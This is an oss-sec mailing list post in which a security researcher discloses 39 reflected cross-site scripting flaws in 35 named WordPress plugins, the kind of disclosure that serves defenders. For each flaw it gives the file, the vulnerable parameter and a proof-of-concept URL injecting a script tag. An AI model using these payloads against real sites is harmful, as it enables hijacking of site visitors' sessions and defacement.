oss-sec mailing list archives

39 XSS vulnerabilities in 35 wordpress plugins.

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 12 Apr 2016 08:48:01 -0400
Hello List,


This was a project I worked on as part of my research in Akamai's SIRT, I initially found 1352 suspect XSS 
vulnerabilities but Wordpress escapes super globals GET/POST/REQUEST
https://core.trac.wordpress.org/ticket/18322.  I didn't know this at the time, so now I have a database of 
vulnerabilities that are context dependent and would need to be examined
individually.  I managed to automate XSS testing against the database and of 1352 39 successfully executed javascript.  
These are those 39, I've manually verified they're still vulnerable.

They're available here http://www.vapidlabs.com/wp/wp.php

I notified Wordpress back in February of my research.


Plugin:https://wordpress.org/plugins/mousewheel-smooth-scroll File:./mousewheel-smooth-scroll/js/wpmss.php 
Parameter:ease  speed step CVE-2016-77447 
PoC:hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php 
Parameter:indexisto_index CVE-2016-77360 
PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/prettypre File:./prettypre/prettyprecss.php Parameter:ts CVE-2016-77548 
PoC:hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVE-2016-77799 
PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-jigsaw File:./mypuzzle-jigsaw/getGallery.php Parameter:callback 
CVE-2016-77465 
PoC:hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVE-2016-77035 
PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/qoate-scroll-triggered-box File:./qoate-scroll-triggered-box/assets/js/script.php 
Parameter:anim perc sac vpos CVE-2016-77559 
PoC:hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media 
CVE-2016-77600 
PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wpsolr-search-engine 
File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  
tab CVE-2016-77958 
PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php 
Parameter:layout_settings_id CVE-2016-77503 
PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-sliding File:./mypuzzle-sliding/getGallery.php Parameter:callback 
CVE-2016-77466 
PoC:hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to 
CVE-2016-77217 
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVE-2016-77217 
PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  
tidio-gallery CVE-2016-77727 
PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVE-2016-77506 
PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php 
Parameter:r CVE-2016-77193 
PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text 
url CVE-2016-77475 
PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVE-2016-77628 
PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/groupon-widget File:./groupon-widget/widget.css.php 
Parameter:grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background 
grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color CVE-2016-77332 
PoC:hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-notifications File:./wp-notifications/css/ln_livenotifications_css.php 
Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color 
dropdown_hover_bgcolor dropdown_link_color CVE-2016-77885 
PoC:hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-latest-posts File:./wp-latest-posts/js/wpcufpn_front.js.php Parameter:id 
CVE-2016-77873 
PoC:hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval 
CVE-2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size 
CVE-2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVE-2016-77337 
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVE-2016-77337 
PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/lbak-google-checkout File:./lbak-google-checkout/css/googlecheckout.php 
Parameter:ih iw ph pw tc CVE-2016-77395 
PoC:hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/razuna-media-manager 
File:./razuna-media-manager/pages/ajax/razuna-upload-callback.php Parameter:message responsecode CVE-2016-77577 
PoC:hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game 
File:./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php Parameter:callback CVE-2016-77464 
PoC:hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/surveymonkey-button File:./surveymonkey-button/start_survey.php 
Parameter:jqueryPepPath CVE-2016-77702 
PoC:hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v 
CVE-2016-77341 
PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network 
File:./bbpress-social-network/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor 
dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 
PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network 
File:./bbpress-social-network/css/ln_livenotifications_cssback.php Parameter:banner_bgcolor dropdown_bgcolor 
dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color 
CVE-2016-77074 
PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid 
CVE-2016-77517 
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid 
CVE-2016-77517 
PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid 
CVE-2016-77532 
PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT 
CVE-2016-77339 
PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form 
CVE-2016-77726 
PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php 
Parameter:ajaxURL CVE-2016-77642 
PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php 
Parameter:ContactId CVE-2016-77364 
PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"
Current thread:

39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 12)
- Re: 39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 13)
- Re: 39 XSS vulnerabilities in 35 wordpress plugins. Larry W. Cashdollar (Apr 14)